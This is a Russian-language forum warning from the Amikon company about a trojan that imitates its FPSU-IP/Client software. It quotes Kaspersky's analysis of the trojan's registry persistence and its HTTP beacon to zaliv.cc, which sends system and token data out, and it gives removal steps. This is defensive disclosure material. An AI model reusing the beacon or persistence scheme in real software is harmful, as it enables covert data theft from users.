ВНИМАНИЕ !!! Появилась вирусная троянская программа, имитирующая работу ПО "ФПСУ-IP/Клиент".

Форум » » ВНИМАНИЕ !!! Появилась вирусная троянская программа, имитирующая работу ПО "ФПСУ-IP/Клиент". » Ответить

ВНИМАНИЕ !!! Появилась вирусная троянская программа, имитирующая работу ПО "ФПСУ-IP/Клиент".

admin: При заражении компьютера появляется окно следующего вида : В случае появления такого сообщения, ООО "Амикон" настоятельно рекомендует провести лечение компьютера антивирусным ПО с актуальными антивирусными базами. Более подробно: Официальный ответ Лаборатории Касперского на наш запрос по поводу данной вредоносной программы был следующий: Trojan.Win32.Agent.mzne Троянская программа, выполняющая деструктивные действия на компьютере пользователя. Программа является приложением Windows (PE EXE-файл). Имеет размер 678912 байт. Упакована при помощи UPX. Распакованный размер - около 10 МБ. Написана на Delphi. Инсталляция Троянец копирует свое тело в системный каталог Windows под именем "amicon.exe": %System%\amicon.exe Для автоматического запуска при следующем старте системы троянец добавляет запись в ключ автозапуска системного реестра: [HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "Amicon Update Service" = "%System%\amicon.exe /s" Также троянец создает службу с именем "Amicon Update Service", за которую отвечает следующий ключ системного реестра: [HKLM\System\CurrentControlSet\Services\Amicon Update Service] Деструктивная активность Троянец выполняет периодическую проверку наличия на зараженном компьютере токена компании "АМИКОН" и отправляет запрос следующего вида: GET /amikon/knock.php?id=[SysInfo]&i=[key] HTTP/1.1 Host: zaliv.cc Accept: text/html, */* User-Agent: Mozilla/3.0 (compatible; Indy Library) Где key - значение, указывающее на наличие токена, SysInfo - последовательность из цифр и букв латинского алфавита полученная на основе значений параметров из следующих ключей системного реестра: [HKLM\Software\Microsoft\Windows NT\CurrentVersion] "DigitalProductId" [HKLM\Hardware\Description\System] "SystemBiosVersion" "VideoBiosVersion" На момент создания описания URL адрес не работал. Во время своей работы троянец отображает окна следующего вида: Рекомендации по удалению Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия: 1. При помощи ("Диспетчера задач") завершить троянский процесс: amicon.exe 2. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер). 3. Удалить файлы: %System%\amicon.exe 4. Удалить ключи системного реестра (как работать с реестром?): [HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "Amicon Update Service" = "%System%\amicon.exe /s" [HKLM\System\CurrentControlSet\Services\Amicon Update Service] 5. Произвести полную проверку компьютера антивирусным ПО с обновленными антивирусными базами (к примеру, Антивирус Касперского: скачать пробную версию). * Сами действия, создаваемые указанным кодом, не несут в себе деструктивную функцию, что собственно характерно для троянских программ.

Ответов - 0

полная версия страницы